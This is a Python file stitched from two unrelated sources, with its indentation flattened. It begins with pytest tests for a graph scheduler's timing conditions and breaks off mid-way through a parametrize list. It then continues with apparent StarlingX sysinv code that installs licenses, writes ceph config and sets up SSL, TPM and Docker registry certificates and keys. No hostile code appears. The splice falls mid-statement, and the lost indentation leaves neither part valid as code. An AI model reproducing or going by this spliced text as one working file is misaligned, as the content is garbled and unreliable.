cond = OneSatisfied(True)
assert cond.is_satisfied(True)
assert cond.is_satisfied(False, c=True)
assert cond.is_satisfied(False, c=False)
cond = OneSatisfied(True, c=False)
assert cond.is_satisfied(True)
assert cond.is_satisfied(False, c=True)
assert cond.is_satisfied(False, c=False)
cond = OneSatisfied(False)
assert cond.is_satisfied(True)
assert cond.is_satisfied(False, c=True)
assert not cond.is_satisfied(False, c=False)
assert not cond.is_satisfied(False, c=False, extra_arg=True)
@pytest.mark.psyneulink
class TestGeneric:
def test_WhileNot_AtPass(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, WhileNot(lambda sched: sched.get_clock(sched.default_execution_id).get_total_times_relative(TimeScale.PASS, TimeScale.ENVIRONMENT_STATE_UPDATE) == 0, sched))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [set(), A, A, A, A]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_WhileNot_AtPass_in_middle(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, WhileNot(lambda sched: sched.get_clock(sched.default_execution_id).get_total_times_relative(TimeScale.PASS, TimeScale.ENVIRONMENT_STATE_UPDATE) == 2, sched))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A, A, set(), A, A]
assert output == pytest.helpers.setify_expected_output(expected_output)
@pytest.mark.psyneulink
class TestRelative:
def test_Any_end_before_one_finished(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
for m in [A]:
comp.add_node(m)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, EveryNPasses(1))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = Any(AfterNCalls(A, 10), AtPass(5))
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A for _ in range(5)]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_All_end_after_one_finished(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
for m in [A]:
comp.add_node(m)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, EveryNPasses(1))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = Any(AfterNCalls(A, 5), AtPass(10))
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A for _ in range(5)]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_Not_AtPass(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, Not(AtPass(0)))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [set(), A, A, A, A]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_Not_AtPass_in_middle(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, Not(AtPass(2)))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A, A, set(), A, A]
assert output == pytest.helpers.setify_expected_output(expected_output)
@pytest.mark.parametrize(
'n,expected_output', [
(0, ['A', 'A', 'A', 'A', 'A', 'A']),
(1, ['A', 'A', 'A', 'B', 'A', 'A', 'A']),
(2, ['A', 'A', 'A', 'B', 'A', 'B', 'A', 'A']),
]
)
def test_NWhen_AfterNCalls(self, n, expected_output):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
B = TransferMechanism(function=Linear(intercept=4.0), name='B')
for m in [A, B]:
comp.add_node(m)
comp.add_projection(MappingProjection(), A, B)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, Always())
sched.add_condition(B, NWhen(AfterNCalls(A, 3), n))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AfterNCalls(A, 6)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A if x == 'A' else B for x in expected_output]
assert output == pytest.helpers.setify_expected_output(expected_output)
@pytest.mark.psyneulink
class TestTimePNL:
def test_BeforeConsiderationSetExecution(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, BeforeConsiderationSetExecution(2))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A, A, set(), set(), set()]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_BeforeConsiderationSetExecution_2(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
B = TransferMechanism(name='B')
comp.add_node(A)
comp.add_node(B)
comp.add_projection(MappingProjection(), A, B)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, BeforeConsiderationSetExecution(2))
sched.add_condition(B, Always())
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A, B, B, B, B, B]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AtConsiderationSetExecution(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, AtConsiderationSetExecution(0))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A, set(), set(), set(), set()]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_BeforePass(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, BeforePass(2))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A, A, set(), set(), set()]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AtPass(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, AtPass(0))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A, set(), set(), set(), set()]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AtPass_underconstrained(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
B = TransferMechanism(function=Linear(intercept=4.0), name='B')
C = TransferMechanism(function=Linear(intercept=1.5), name='C')
for m in [A, B, C]:
comp.add_node(m)
comp.add_projection(MappingProjection(), A, B)
comp.add_projection(MappingProjection(), B, C)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, AtPass(0))
sched.add_condition(B, Always())
sched.add_condition(C, Always())
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AfterNCalls(C, 2)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [A, B, C, B, C]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AtPass_in_middle(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, AtPass(2))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [set(), set(), A, set(), set()]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AtPass_at_end(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, AtPass(5))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [set(), set(), set(), set(), set()]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AtPass_after_end(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, AtPass(6))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [set(), set(), set(), set(), set()]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AfterPass(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, AfterPass(0))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [set(), A, A, A, A]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AfterNPasses(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, AfterNPasses(1))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [set(), A, A, A, A]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_BeforeEnvironmentStateUpdate(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, BeforeEnvironmentStateUpdate(4))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(5)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(1)
comp.run(
inputs={A: range(6)},
scheduler=sched,
termination_processing=termination_conds
)
output = sched.execution_list[comp.default_execution_id]
expected_output = [A, A, A, A, set()]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AtEnvironmentStateUpdate(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, Always())
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AtEnvironmentStateUpdate(4)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(1)
comp.run(
inputs={A: range(6)},
scheduler=sched,
termination_processing=termination_conds
)
output = sched.execution_list[comp.default_execution_id]
expected_output = [A, A, A, A]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AfterEnvironmentStateUpdate(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, Always())
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterEnvironmentStateUpdate(4)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(1)
comp.run(
inputs={A: range(6)},
scheduler=sched,
termination_processing=termination_conds
)
output = sched.execution_list[comp.default_execution_id]
expected_output = [A, A, A, A, A]
assert output == pytest.helpers.setify_expected_output(expected_output)
def test_AfterNEnvironmentStateUpdates(self):
comp = Composition()
A = TransferMechanism(function=Linear(slope=5.0, intercept=2.0), name='A')
comp.add_node(A)
sched = Scheduler(**pytest.helpers.composition_to_scheduler_args(comp))
sched.add_condition(A, AfterNPasses(1))
termination_conds = {}
termination_conds[TimeScale.ENVIRONMENT_SEQUENCE] = AfterNEnvironmentStateUpdates(1)
termination_conds[TimeScale.ENVIRONMENT_STATE_UPDATE] = AtPass(5)
output = list(sched.run(termination_conds=termination_conds))
expected_output = [set(), A, A, A, A]
assert output == pytest.helpers.setify_expected_output(expected_output)
class TestTime:
@pytest.mark.parametrize(
'node_condition, termination_conditions, expected_output',
[
pytest.param(
graph_scheduler.AfterNPasses(1),
{
TimeScale.ENVIRONMENT_SEQUENCE: graph_scheduler.AfterNEnvironmentStateUpdates(1),
TimeScale.ENVIRONMENT_STATE_UPDATE: graph_scheduler.AfterConsiderationSetExecution(4)
},
[set(), 'A', 'A', 'A', 'A'],
id='AfterConsiderationSetExecution'
),
pytest.param(
graph_scheduler.AfterNPasses(1),
{
TimeScale.ENVIRONMENT_SEQUENCE: graph_scheduler.AfterNEnvironmentStateUpdates(1),
TimeScale.ENVIRONMENT_STATE_UPDATE: graph_scheduler.AfterNConsiderationSetExecutions(5)
},
[set(), 'A', 'A', 'A', 'A'],
id='AfterNConsiderationSetExecutions'
),
]
)
def test_single_node(
self, node_condition, termination_conditions, expected_output
):
graph = {'A': set()}
sched = graph_scheduler.Scheduler(graph)
sched.add_condition('A', node_condition)
output = list(sched.run(termination_conds=termination_conditions))
assert output == pytest.helpers.setify_expected_output(expected_output)
@pytest.mark.parametrize(
'node_condition, termination_conditions, expected_output, n_sequences, n_state_updates_per_sequence',
[
pytest.param(
graph_scheduler.AtEnvironmentStateUpdateNStart(2),
{TimeScale.ENVIRONMENT_STATE_UPDATE: graph_scheduler.AfterNPasses(1)},
[[set(), set(), 'A', set()]],
1,
4,
id='AtEnvironmentStateUpdateNStart'
),
pytest.param(
graph_scheduler.AtEnvironmentSequence(4),
{TimeScale.ENVIRONMENT_STATE_UPDATE: graph_scheduler.AfterNPasses(1)},
[[set()], [set()], [set()], [set()], ['A'], [set()]],
6,
1,
id='AtEnvironmentSequence'
),
pytest.param(
graph_scheduler.AfterEnvironmentSequence(3),
{TimeScale.ENVIRONMENT_STATE_UPDATE: graph_scheduler.AfterNPasses(1)},
[[set()], [set()], [set()], [set()], ['A'],
        # If the ceph config file already exists, we will allow it to be overwritten.
# Thus, we won't raise an exception if the file already exists.
if os.path.exists(opt_ceph_conf_file):
LOG.info("Overwriting file %s in %s " %
(ceph_conf_filename, tsc.PLATFORM_CEPH_CONF_PATH))
try:
with open(opt_ceph_conf_file, 'w+') as f:
f.write(contents)
except IOError:
msg = _("Failed to write ceph config file in %s " %
tsc.PLATFORM_CEPH_CONF_PATH)
raise exception.SysinvException(msg)
def install_license_file(self, context, contents):
"""Notify agent to install license file with the supplied data.
:param context: request context.
:param contents: contents of license file.
"""
LOG.info("Install license file.")
license_file = os.path.join(tsc.PLATFORM_CONF_PATH,
constants.LICENSE_FILE)
temp_license_file = license_file + '.temp'
with open(temp_license_file, 'w') as f:
f.write(contents)
f.close()
# Verify license
try:
license.verify_license(temp_license_file)
except Exception as e:
raise exception.SysinvException(str(e))
os.rename(temp_license_file, license_file)
try:
subprocess.check_output(["cp", license_file,
os.path.join(tsc.CONFIG_PATH, constants.LICENSE_FILE)])
except subprocess.CalledProcessError as e:
LOG.error("Fail to install license to redundant "
"storage, output: %s" % e.output)
os.remove(license_file)
raise exception.SysinvException(_(
"ERROR: Failed to install license to redundant storage."))
hostname = subprocess.check_output(["hostname"]).rstrip()
validHostnames = [constants.CONTROLLER_0_HOSTNAME,
constants.CONTROLLER_1_HOSTNAME]
if hostname == 'localhost':
raise exception.SysinvException(_(
"ERROR: Host undefined. Unable to install license"))
elif hostname not in validHostnames:
raise exception.SysinvException(_(
"ERROR: Invalid hostname for controller node: %s") % hostname)
personalities = [constants.CONTROLLER]
config_uuid = self._config_update_hosts(context, personalities)
config_dict = {
'personalities': personalities,
'file_names': [license_file],
'file_content': contents,
}
self._config_update_file(context, config_uuid, config_dict)
def update_distributed_cloud_role(self, context):
"""Configure the distributed cloud role.
:param context: an admin context.
"""
        # update manifest files and notify agents to apply the change.
# Should only be applicable to the single controller that is up
# when the dc role is configured, but add personalities anyway.
personalities = [constants.CONTROLLER,
constants.WORKER,
constants.STORAGE]
config_uuid = self._config_update_hosts(context, personalities)
# NOTE: no specific classes need to be specified since the default
# platform::config will be applied that will configure the platform.conf
config_dict = {"personalities": personalities}
self._config_apply_runtime_manifest(context, config_uuid, config_dict)
def _destroy_certificates(self, context):
"""Delete certificates."""
LOG.info("_destroy_certificates clear ssl/tpm certificates")
certificates = self.dbapi.certificate_get_list()
for certificate in certificates:
if certificate.certtype in [constants.CERT_MODE_SSL,
constants.CERT_MODE_TPM,
constants.CERT_MODE_OPENSTACK]:
self.dbapi.certificate_destroy(certificate.uuid)
personalities = [constants.CONTROLLER]
config_uuid = self._config_update_hosts(context, personalities)
config_dict = {
'personalities': personalities,
'file_names': [constants.SSL_PEM_FILE],
'file_content': None,
'permissions': constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY,
'nobackup': True,
}
self._config_update_file(context, config_uuid, config_dict)
def _destroy_tpm_config(self, context, tpm_obj=None):
"""Delete a tpmconfig."""
if not tpm_obj:
tpm_obj = None
try:
tpm_obj = self.dbapi.tpmconfig_get_one()
except exception.NotFound:
return
tpm_file = tpm_obj.tpm_path
tpmdevices = self.dbapi.tpmdevice_get_list()
for device in tpmdevices:
self.dbapi.tpmdevice_destroy(device.uuid)
self.dbapi.tpmconfig_destroy(tpm_obj.uuid)
self.update_tpm_config_manifests(context,
delete_tpm_file=tpm_file)
alarms = self.fm_api.get_faults_by_id(
fm_constants.FM_ALARM_ID_TPM_INIT)
if alarms:
for alarm in alarms:
self.fm_api.clear_fault(
fm_constants.FM_ALARM_ID_TPM_INIT,
alarm.entity_instance_id)
@staticmethod
def _extract_keys_from_pem(mode, pem_contents, cert_format,
passphrase=None):
"""Extract keys from the pem contents
:param mode: mode one of: ssl, tpm_mode, docker_registry
:param pem_contents: pem_contents
:param cert_format: serialization.PrivateFormat
:param passphrase: passphrase for PEM file
:returns: private_bytes, public_bytes, signature
"""
temp_pem_file = constants.SSL_PEM_FILE + '.temp'
with os.fdopen(os.open(temp_pem_file, os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY),
'w') as f:
f.write(pem_contents)
if passphrase:
            passphrase = str(passphrase)
private_bytes = None
private_mode = False
if mode in [constants.CERT_MODE_SSL,
constants.CERT_MODE_TPM,
constants.CERT_MODE_DOCKER_REGISTRY,
constants.CERT_MODE_OPENSTACK,
]:
private_mode = True
with open(temp_pem_file, "r") as key_file:
if private_mode:
# extract private_key with passphrase
try:
private_key = serialization.load_pem_private_key(
key_file.read(),
                        password=passphrase,
backend=default_backend())
except Exception as e:
raise exception.SysinvException(_("Error decrypting PEM "
"file: %s" % e))
key_file.seek(0)
# extract the certificate from the pem file
cert = x509.load_pem_x509_certificate(key_file.read(),
default_backend())
os.remove(temp_pem_file)
if private_mode:
if not isinstance(private_key, rsa.RSAPrivateKey):
raise exception.SysinvException(_("Only RSA encryption based "
"Private Keys are supported."))
private_bytes = private_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=cert_format,
encryption_algorithm=serialization.NoEncryption())
signature = mode + '_' + str(cert.serial_number)
if len(signature) > 255:
LOG.info("Truncating certificate serial no %s" % signature)
signature = signature[:255]
LOG.info("config_certificate signature=%s" % signature)
# format=serialization.PrivateFormat.TraditionalOpenSSL,
public_bytes = cert.public_bytes(encoding=serialization.Encoding.PEM)
return private_bytes, public_bytes, signature
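    # Illustrative sketch (not part of the original module) of how the three values
    # returned by _extract_keys_from_pem() are consumed by a caller; the PEM path
    # below is hypothetical:
    #
    #   with open('/tmp/server.pem') as f:
    #       pem_contents = f.read()
    #   private_bytes, public_bytes, signature = self._extract_keys_from_pem(
    #       constants.CERT_MODE_SSL, pem_contents,
    #       serialization.PrivateFormat.PKCS8, passphrase=None)
    #   # signature is "<mode>_<serial number>", e.g. "ssl_1234567890",
    #   # truncated to 255 characters before being returned.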
def _perform_config_certificate_tpm_mode(self, context,
tpm, private_bytes, public_bytes):
personalities = [constants.CONTROLLER]
os_tpmdevices = glob.glob('/dev/tpm*')
if not os_tpmdevices:
msg = "TPM device does not exist on active controller"
LOG.warn(msg)
raise exception.SysinvException(_(msg))
config_uuid = self._config_update_hosts(context, personalities)
cert_path = constants.SSL_CERT_DIR + 'key.pem'
public_path = constants.SSL_CERT_DIR + 'cert.pem'
config_dict = {
'personalities': personalities,
'file_names': [cert_path, public_path],
'file_content': {cert_path: private_bytes,
public_path: public_bytes},
'permissions': constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY,
}
self._config_update_file(context, config_uuid, config_dict)
tpmconfig_dict = {'tpm_path': constants.SSL_CERT_DIR + 'object.tpm'}
if not tpm:
self.dbapi.tpmconfig_create(tpmconfig_dict)
tpmconfig_dict.update(
{'cert_path': constants.SSL_CERT_DIR + 'key.pem',
'public_path': constants.SSL_CERT_DIR + 'cert.pem'})
self.update_tpm_config(context,
tpmconfig_dict,
update_file_required=False)
def _get_registry_floating_address(self):
"""gets the registry floating address. Currently this is mgmt
"""
registry_network = self.dbapi.network_get_by_type(
constants.NETWORK_TYPE_MGMT)
registry_network_addr_pool = self.dbapi.address_pool_get(
registry_network.pool_uuid)
addr = registry_network_addr_pool.floating_address
return addr
def config_certificate(self, context, pem_contents, config_dict):
"""Configure certificate with the supplied data.
:param context: an admin context.
:param pem_contents: contents of certificate in pem format.
:param config_dict: dictionary of certificate config attributes.
In regular mode, the SSL certificate is crafted from the
isolated private and public keys.
In tpm_mode, this is done by tpmconfig
"""
passphrase = config_dict.get('passphrase', None)
mode = config_dict.get('mode', None)
LOG.info("config_certificate mode=%s" % mode)
private_bytes, public_bytes, signature = \
self._extract_keys_from_pem(mode, pem_contents,
serialization.PrivateFormat.PKCS8,
passphrase)
personalities = [constants.CONTROLLER]
tpm = None
try:
tpm = self.dbapi.tpmconfig_get_one()
except exception.NotFound:
pass
if mode == constants.CERT_MODE_TPM:
self._perform_config_certificate_tpm_mode(
context, tpm, private_bytes, public_bytes)
file_content = public_bytes
# copy the certificate to shared directory
with os.fdopen(os.open(constants.SSL_PEM_FILE_SHARED,
os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY),
'wb') as f:
f.write(file_content)
elif mode == constants.CERT_MODE_SSL:
config_uuid = self._config_update_hosts(context, personalities)
file_content = private_bytes + public_bytes
config_dict = {
'personalities': personalities,
'file_names': [constants.SSL_PEM_FILE],
'file_content': file_content,
'nobackup': True,
'permissions': constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY,
}
self._config_update_file(context, config_uuid, config_dict)
# copy the certificate to shared directory
with os.fdopen(os.open(constants.SSL_PEM_FILE_SHARED,
os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY),
'wb') as f:
f.write(file_content)
if tpm:
LOG.info("tpm_mode not requested; destroy tpmconfig=%s" %
tpm.uuid)
self._destroy_tpm_config(context, tpm_obj=tpm)
config_uuid = self._config_update_hosts(context, personalities)
config_dict = {
"personalities": personalities,
"classes": ['platform::haproxy::runtime',
'openstack::horizon::runtime']
}
self._config_apply_runtime_manifest(context,
config_uuid,
config_dict)
elif mode == constants.CERT_MODE_SSL_CA:
file_content = public_bytes
personalities = [constants.CONTROLLER,
constants.WORKER,
constants.STORAGE]
# copy the certificate to shared directory
with os.fdopen(os.open(constants.SSL_CERT_CA_FILE_SHARED,
os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_DEFAULT),
'wb') as f:
f.write(file_content)
config_uuid = self._config_update_hosts(context, personalities)
config_dict = {
"personalities": personalities,
"classes": ['platform::config::runtime']
}
self._config_apply_runtime_manifest(context,
config_uuid,
config_dict,
force=True)
elif mode == constants.CERT_MODE_DOCKER_REGISTRY:
LOG.info("Docker registry certificate install")
# docker registry requires a PKCS1 key for the token server
pkcs1_private_bytes, pkcs1_public_bytes, pkcs1_signature = \
self._extract_keys_from_pem(mode, pem_contents,
serialization.PrivateFormat
.TraditionalOpenSSL, passphrase)
# install certificate, key, and pkcs1 key to controllers
config_uuid = self._config_update_hosts(context, personalities)
key_path = constants.DOCKER_REGISTRY_KEY_FILE
cert_path = constants.DOCKER_REGISTRY_CERT_FILE
pkcs1_key_path = constants.DOCKER_REGISTRY_PKCS1_KEY_FILE
config_dict = {
'personalities': personalities,
'file_names': [key_path, cert_path, pkcs1_key_path],
'file_content': {key_path: private_bytes,
cert_path: public_bytes,
pkcs1_key_path: pkcs1_private_bytes},
'nobackup': True,
'permissions': constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY,
}
self._config_update_file(context, config_uuid, config_dict)
# copy certificate to shared directory
with os.fdopen(os.open(constants.DOCKER_REGISTRY_CERT_FILE_SHARED,
os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY),
'wb') as f:
f.write(public_bytes)
with os.fdopen(os.open(constants.DOCKER_REGISTRY_KEY_FILE_SHARED,
os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY),
'wb') as f:
f.write(private_bytes)
with os.fdopen(os.open(constants.DOCKER_REGISTRY_PKCS1_KEY_FILE_SHARED,
os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY),
'wb') as f:
f.write(pkcs1_private_bytes)
config_uuid = self._config_update_hosts(context, personalities)
config_dict = {
"personalities": personalities,
"classes": ['platform::dockerdistribution::runtime']
}
self._config_apply_runtime_manifest(context,
config_uuid,
config_dict)
# install docker certificate on controllers and workers
docker_cert_path = os.path.join("/etc/docker/certs.d",
constants.DOCKER_REGISTRY_SERVER,
"registry-cert.crt")
personalities = [constants.CONTROLLER,
constants.WORKER]
config_uuid = self._config_update_hosts(context,
personalities)
config_dict = {
'personalities': personalities,
'file_names': [docker_cert_path],
'file_content': public_bytes,
'nobackup': True,
'permissions': constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY,
}
self._config_update_file(context, config_uuid, config_dict)
elif mode == constants.CERT_MODE_OPENSTACK:
config_uuid = self._config_update_hosts(context, personalities)
key_path = constants.OPENSTACK_CERT_KEY_FILE
cert_path = constants.OPENSTACK_CERT_FILE
config_dict = {
'personalities': personalities,
'file_names': [key_path, cert_path],
'file_content': {key_path: private_bytes,
cert_path: public_bytes},
'nobackup': True,
'permissions': constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY,
}
self._config_update_file(context, config_uuid, config_dict)
if not os.path.exists(constants.CERT_OPENSTACK_SHARED_DIR):
os.makedirs(constants.CERT_OPENSTACK_SHARED_DIR)
# copy the certificate to shared directory
with os.fdopen(os.open(constants.OPENSTACK_CERT_FILE_SHARED,
os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY),
'wb') as f:
f.write(public_bytes)
with os.fdopen(os.open(constants.OPENSTACK_CERT_KEY_FILE_SHARED,
